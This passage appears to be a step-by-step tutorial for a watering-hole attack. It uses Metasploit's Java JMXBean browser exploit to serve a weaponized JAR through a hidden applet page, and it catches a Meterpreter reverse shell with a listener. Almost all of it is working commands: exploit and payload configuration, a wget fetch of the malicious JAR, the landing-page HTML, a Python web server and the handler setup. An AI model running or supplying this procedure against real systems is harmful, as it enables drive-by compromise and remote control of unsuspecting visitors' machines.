In this case, the Java JMXBean 2 vulnerability which affects Java versions 1.7 and under will be leveraged.
Initialize Metasploit console 'msfconsole' and use:
use exploit/multi/browser/java_jre17_jmxbean_2
Set the payload (Java Meterpreter Reverse TCP):
set PAYLOAD java/meterpreter/reverse_tcp
Show and Set Options:
show options
The interest here is to just grab the JAR file from the Metasploit server. Set the SRVHOST to 127.0.0.1. However, keep in mind that the LHOST variable should be set to to point to the IP that will actually host the Meterpreter listener. In this example, I set the LHOST to 10.0.0.10.
set SRVHOST 127.0.0.1
set LHOST 10.0.0.10
Now start the listener:
exploit
Take note of the URI path, it's randomized and will be different than the above screenshot. Create a 'wget' request and grab the weaponized JAR.
wget http://127.0.0.1:8080/TneGeXfpn2/Archive.jar
We can now use Python to create a simple webserver to host the "watering-hole" landing page. First, we create the 'index.html' file with embed code to invoke the JAR:
<html><head></head><body><applet archive="Archive.jar" code="Exploit.class" width="1" height="1"></applet></body></html>
Dump both the 'index.html' and 'Archive.jar' into a world readable directory. From within that directory execute the Python command to launch the web server:
python -m SimpleHTTPServer 80
Don't forget to start your Metasploit listener on the machine you pointed the LHOST IP variable back to.
use exploit/multi/handler
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 10.0.0.10
exploit
